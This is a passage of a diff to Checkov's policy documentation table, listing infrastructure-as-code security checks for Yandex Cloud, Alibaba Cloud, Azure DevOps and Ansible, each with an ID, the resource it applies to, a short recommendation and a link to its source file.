| Terraform | [IAMCloudElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMCloudElevatedMembers.py) | -| 3683 | CKV_YC_14 | resource | yandex_kubernetes_cluster | Ensure security group is assigned to Kubernetes cluster. | Terraform | [K8SSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SSecurityGroup.py) | -| 3684 | CKV_YC_15 | resource | yandex_kubernetes_node_group | Ensure security group is assigned to Kubernetes node group. | Terraform | [K8SNodeGroupSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNodeGroupSecurityGroup.py) | -| 3685 | CKV_YC_16 | resource | yandex_kubernetes_cluster | Ensure network policy is assigned to Kubernetes cluster. | Terraform | [K8SNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNetworkPolicy.py) | -| 3686 | CKV_YC_17 | resource | yandex_storage_bucket | Ensure storage bucket does not have public access permissions. | Terraform | [ObjectStorageBucketPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ObjectStorageBucketPublicAccess.py) | -| 3687 | CKV_YC_18 | resource | yandex_compute_instance_group | Ensure compute instance group does not have public IP. | Terraform | [ComputeInstanceGroupPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeInstanceGroupPublicIP.py) | -| 3688 | CKV_YC_19 | resource | yandex_vpc_security_group | Ensure security group does not contain allow-all rules. 
| Terraform | [VPCSecurityGroupAllowAll.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/VPCSecurityGroupAllowAll.py) | -| 3689 | CKV_YC_20 | resource | yandex_vpc_security_group_rule | Ensure security group rule is not allow-all. | Terraform | [VPCSecurityGroupRuleAllowAll.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/VPCSecurityGroupRuleAllowAll.py) | -| 3690 | CKV_YC_21 | resource | yandex_organizationmanager_organization_iam_binding | Ensure organization member does not have elevated access. | Terraform | [IAMOrganizationElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMOrganizationElevatedMembers.py) | -| 3691 | CKV_YC_21 | resource | yandex_organizationmanager_organization_iam_member | Ensure organization member does not have elevated access. | Terraform | [IAMOrganizationElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMOrganizationElevatedMembers.py) | -| 3692 | CKV_YC_22 | resource | yandex_compute_instance_group | Ensure compute instance group has security group assigned. | Terraform | [ComputeInstanceGroupSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeInstanceGroupSecurityGroup.py) | -| 3693 | CKV_YC_23 | resource | yandex_resourcemanager_folder_iam_binding | Ensure folder member does not have elevated access. | Terraform | [IAMFolderElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMFolderElevatedMembers.py) | -| 3694 | CKV_YC_23 | resource | yandex_resourcemanager_folder_iam_member | Ensure folder member does not have elevated access. 
| Terraform | [IAMFolderElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMFolderElevatedMembers.py) | -| 3695 | CKV_YC_24 | resource | yandex_organizationmanager_organization_iam_binding | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | -| 3696 | CKV_YC_24 | resource | yandex_organizationmanager_organization_iam_member | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | -| 3697 | CKV_YC_24 | resource | yandex_resourcemanager_cloud_iam_binding | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | -| 3698 | CKV_YC_24 | resource | yandex_resourcemanager_cloud_iam_member | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | -| 3699 | CKV_YC_24 | resource | yandex_resourcemanager_folder_iam_binding | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. 
| Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | -| 3700 | CKV_YC_24 | resource | yandex_resourcemanager_folder_iam_member | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | +| | Id | Type | Entity | Policy | IaC | Resource Link | +|------|--------------------------|----------------------------------|--------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|-------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| 0 | CKV2_ADO_1 | resource | azuredevops_branch_policy_min_reviewers | Ensure at least two approving reviews for PRs | Terraform | [ADORepositoryHasMinTwoReviewers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azuredevops/ADORepositoryHasMinTwoReviewers.yaml) | +| 1 | CKV2_ADO_1 | resource | azuredevops_git_repository | Ensure at least two approving reviews for PRs | Terraform | [ADORepositoryHasMinTwoReviewers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azuredevops/ADORepositoryHasMinTwoReviewers.yaml) | +| 2 | CKV_ALI_1 | resource | alicloud_oss_bucket | Alibaba Cloud OSS bucket accessible to public | Terraform | 
[OSSBucketPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketPublic.py) | +| 3 | CKV_ALI_2 | resource | alicloud_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/SecurityGroupUnrestrictedIngress22.py) | +| 4 | CKV_ALI_3 | resource | alicloud_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/SecurityGroupUnrestrictedIngress3389.py) | +| 5 | CKV_ALI_4 | resource | alicloud_actiontrail_trail | Ensure Action Trail Logging for all regions | Terraform | [ActionTrailLogAllRegions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/ActionTrailLogAllRegions.py) | +| 6 | CKV_ALI_5 | resource | alicloud_actiontrail_trail | Ensure Action Trail Logging for all events | Terraform | [ActionTrailLogAllEvents.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/ActionTrailLogAllEvents.py) | +| 7 | CKV_ALI_6 | resource | alicloud_oss_bucket | Ensure OSS bucket is encrypted with Customer Master Key | Terraform | [OSSBucketEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketEncryptedWithCMK.py) | +| 8 | CKV_ALI_7 | resource | alicloud_disk | Ensure disk is encrypted | Terraform | [DiskIsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/DiskIsEncrypted.py) | +| 9 | CKV_ALI_8 | resource | alicloud_disk | Ensure Disk is encrypted with Customer Master Key | Terraform | 
[DiskEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/DiskEncryptedWithCMK.py) | +| 10 | CKV_ALI_9 | resource | alicloud_db_instance | Ensure database instance is not public | Terraform | [RDSIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSIsPublic.py) | +| 11 | CKV_ALI_10 | resource | alicloud_oss_bucket | Ensure OSS bucket has versioning enabled | Terraform | [OSSBucketVersioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketVersioning.py) | +| 12 | CKV_ALI_11 | resource | alicloud_oss_bucket | Ensure OSS bucket has transfer Acceleration enabled | Terraform | [OSSBucketTransferAcceleration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketTransferAcceleration.py) | +| 13 | CKV_ALI_12 | resource | alicloud_oss_bucket | Ensure the OSS bucket has access logging enabled | Terraform | [OSSBucketAccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketAccessLogs.py) | +| 14 | CKV_ALI_13 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires minimum length of 14 or greater | Terraform | [RAMPasswordPolicyLength.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyLength.py) | +| 15 | CKV_ALI_14 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires at least one number | Terraform | [RAMPasswordPolicyNumber.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyNumber.py) | +| 16 | CKV_ALI_15 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires at least one symbol | Terraform | 
[RAMPasswordPolicySymbol.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicySymbol.py) | +| 17 | CKV_ALI_16 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy expires passwords within 90 days or less | Terraform | [RAMPasswordPolicyExpiration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyExpiration.py) | +| 18 | CKV_ALI_17 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires at least one lowercase letter | Terraform | [RAMPasswordPolicyLowercaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyLowercaseLetter.py) | +| 19 | CKV_ALI_18 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy prevents password reuse | Terraform | [RAMPasswordPolicyReuse.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyReuse.py) | +| 20 | CKV_ALI_19 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires at least one uppercase letter | Terraform | [RAMPasswordPolicyUppcaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyUppcaseLetter.py) | +| 21 | CKV_ALI_20 | resource | alicloud_db_instance | Ensure RDS instance uses SSL | Terraform | [RDSInstanceSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceSSL.py) | +| 22 | CKV_ALI_21 | resource | alicloud_api_gateway_api | Ensure API Gateway API Protocol HTTPS | Terraform | [APIGatewayProtocolHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/APIGatewayProtocolHTTPS.py) | +| 23 | CKV_ALI_22 | resource | alicloud_db_instance | Ensure Transparent Data Encryption is Enabled on instance | 
Terraform | [RDSTransparentDataEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSTransparentDataEncryptionEnabled.py) | +| 24 | CKV_ALI_23 | resource | alicloud_ram_account_password_policy | Ensure Ram Account Password Policy Max Login Attempts not > 5 | Terraform | [RAMPasswordPolicyMaxLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyMaxLogin.py) | +| 25 | CKV_ALI_24 | resource | alicloud_ram_security_preference | Ensure RAM enforces MFA | Terraform | [RAMSecurityEnforceMFA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMSecurityEnforceMFA.py) | +| 26 | CKV_ALI_25 | resource | alicloud_db_instance | Ensure RDS Instance SQL Collector Retention Period should be greater than 180 | Terraform | [RDSRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSRetention.py) | +| 27 | CKV_ALI_26 | resource | alicloud_cs_kubernetes | Ensure Kubernetes installs plugin Terway or Flannel to support standard policies | Terraform | [K8sEnableNetworkPolicies.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/K8sEnableNetworkPolicies.py) | +| 28 | CKV_ALI_27 | resource | alicloud_kms_key | Ensure KMS Key Rotation is enabled | Terraform | [KMSKeyRotationIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/KMSKeyRotationIsEnabled.py) | +| 29 | CKV_ALI_28 | resource | alicloud_kms_key | Ensure KMS Keys are enabled | Terraform | [KMSKeyIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/KMSKeyIsEnabled.py) | +| 30 | CKV_ALI_29 | resource | alicloud_alb_acl_entry_attachment | Alibaba ALB ACL does not restrict Access | Terraform | 
[ALBACLIsUnrestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/ALBACLIsUnrestricted.py) | +| 31 | CKV_ALI_30 | resource | alicloud_db_instance | Ensure RDS instance auto upgrades for minor versions | Terraform | [RDSInstanceAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceAutoUpgrade.py) | +| 32 | CKV_ALI_31 | resource | alicloud_cs_kubernetes_node_pool | Ensure K8s nodepools are set to auto repair | Terraform | [K8sNodePoolAutoRepair.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/K8sNodePoolAutoRepair.py) | +| 33 | CKV_ALI_32 | resource | alicloud_ecs_launch_template | Ensure launch template data disks are encrypted | Terraform | [LaunchTemplateDisksAreEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/LaunchTemplateDisksAreEncrypted.py) | +| 34 | CKV_ALI_33 | resource | alicloud_slb_tls_cipher_policy | Alibaba Cloud Cypher Policy are secure | Terraform | [TLSPoliciesAreSecure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/TLSPoliciesAreSecure.py) | +| 35 | CKV_ALI_35 | resource | alicloud_db_instance | Ensure RDS instance has log_duration enabled | Terraform | [RDSInstanceLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceLogsEnabled.py) | +| 36 | CKV_ALI_36 | resource | alicloud_db_instance | Ensure RDS instance has log_disconnections enabled | Terraform | [RDSInstanceLogDisconnections.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceLogDisconnections.py) | +| 37 | CKV_ALI_37 | resource | alicloud_db_instance | Ensure RDS instance has log_connections enabled | Terraform | 
[RDSInstanceLogConnections.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceLogConnections.py) | +| 38 | CKV_ALI_38 | resource | alicloud_log_audit | Ensure log audit is enabled for RDS | Terraform | [LogAuditRDSEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/LogAuditRDSEnabled.py) | +| 39 | CKV_ALI_41 | resource | alicloud_mongodb_instance | Ensure MongoDB is deployed inside a VPC | Terraform | [MongoDBInsideVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBInsideVPC.py) | +| 40 | CKV_ALI_42 | resource | alicloud_mongodb_instance | Ensure Mongodb instance uses SSL | Terraform | [MongoDBInstanceSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBInstanceSSL.py) | +| 41 | CKV_ALI_43 | resource | alicloud_mongodb_instance | Ensure MongoDB instance is not public | Terraform | [MongoDBIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBIsPublic.py) | +| 42 | CKV_ALI_44 | resource | alicloud_mongodb_instance | Ensure MongoDB has Transparent Data Encryption Enabled | Terraform | [MongoDBTransparentDataEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBTransparentDataEncryptionEnabled.py) | +| 43 | CKV_ANSIBLE_1 | resource | [?"ansible.builtin.uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | +| 44 | CKV_ANSIBLE_1 | resource | [?"uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | +| 
45 | CKV_ANSIBLE_1 | resource | [].block[?"ansible.builtin.uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | +| 46 | CKV_ANSIBLE_1 | resource | [].block[?"uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | +| 47 | CKV_ANSIBLE_1 | resource | [].block[].block[?"ansible.builtin.uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | +| 48 | CKV_ANSIBLE_1 | resource | [].block[].block[?"uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | +| 49 | CKV_ANSIBLE_1 | resource | [].block[].block[].block[?"ansible.builtin.uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | +| 50 | CKV_ANSIBLE_1 | resource | [].block[].block[].block[?"uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | +| 51 | CKV_ANSIBLE_1 | resource | [].tasks[?"ansible.builtin.uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | +| 52 | CKV_ANSIBLE_1 | 
resource | [].tasks[?"uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | +| 53 | CKV_ANSIBLE_1 | resource | [].tasks[].block[?"ansible.builtin.uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | +| 54 | CKV_ANSIBLE_1 | resource | [].tasks[].block[?"uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | +| 55 | CKV_ANSIBLE_1 | resource | [].tasks[].block[].block[?"ansible.builtin.uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | +| 56 | CKV_ANSIBLE_1 | resource | [].tasks[].block[].block[?"uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | +| 57 | CKV_ANSIBLE_1 | resource | [].tasks[].block[].block[].block[?"ansible.builtin.uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | +| 58 | CKV_ANSIBLE_1 | resource | [].tasks[].block[].block[].block[?"uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | +| 59 | 
CKV_ANSIBLE_2 | resource | [?"ansible.builtin.get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | +| 60 | CKV_ANSIBLE_2 | resource | [?"get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | +| 61 | CKV_ANSIBLE_2 | resource | [].block[?"ansible.builtin.get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | +| 62 | CKV_ANSIBLE_2 | resource | [].block[?"get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | +| 63 | CKV_ANSIBLE_2 | resource | [].block[].block[?"ansible.builtin.get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | +| 64 | CKV_ANSIBLE_2 | resource | [].block[].block[?"get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | +| 65 | CKV_ANSIBLE_2 | resource | [].block[].block[].block[?"ansible.builtin.get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | 
[GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | +| 66 | CKV_ANSIBLE_2 | resource | [].block[].block[].block[?"get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | +| 67 | CKV_ANSIBLE_2 | resource | [].tasks[?"ansible.builtin.get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | +| 68 | CKV_ANSIBLE_2 | resource | [].tasks[?"get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | +| 69 | CKV_ANSIBLE_2 | resource | [].tasks[].block[?"ansible.builtin.get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | +| 70 | CKV_ANSIBLE_2 | resource | [].tasks[].block[?"get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | +| 71 | CKV_ANSIBLE_2 | resource | [].tasks[].block[].block[?"ansible.builtin.get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | +| 72 | CKV_ANSIBLE_2 | resource | [].tasks[].block[].block[?"get_url" != null][] | 
Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | +| 73 | CKV_ANSIBLE_2 | resource | [].tasks[].block[].block[].block[?"ansible.builtin.get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | +| 74 | CKV_ANSIBLE_2 | resource | [].tasks[].block[].block[].block[?"get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | +| 75 | CKV_ANSIBLE_3 | resource | [?"ansible.builtin.yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | +| 76 | CKV_ANSIBLE_3 | resource | [?"yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | +| 77 | CKV_ANSIBLE_3 | resource | [].block[?"ansible.builtin.yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | +| 78 | CKV_ANSIBLE_3 | resource | [].block[?"yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | +| 79 | CKV_ANSIBLE_3 | resource | [].block[].block[?"ansible.builtin.yum" != 
null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | +| 80 | CKV_ANSIBLE_3 | resource | [].block[].block[?"yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | +| 81 | CKV_ANSIBLE_3 | resource | [].block[].block[].block[?"ansible.builtin.yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | +| 82 | CKV_ANSIBLE_3 | resource | [].block[].block[].block[?"yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | +| 83 | CKV_ANSIBLE_3 | resource | [].tasks[?"ansible.builtin.yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | +| 84 | CKV_ANSIBLE_3 | resource | [].tasks[?"yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | +| 85 | CKV_ANSIBLE_3 | resource | [].tasks[].block[?"ansible.builtin.yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | +| 86 | CKV_ANSIBLE_3 | resource | [].tasks[].block[?"yum" != null][] | Ensure that certificate 
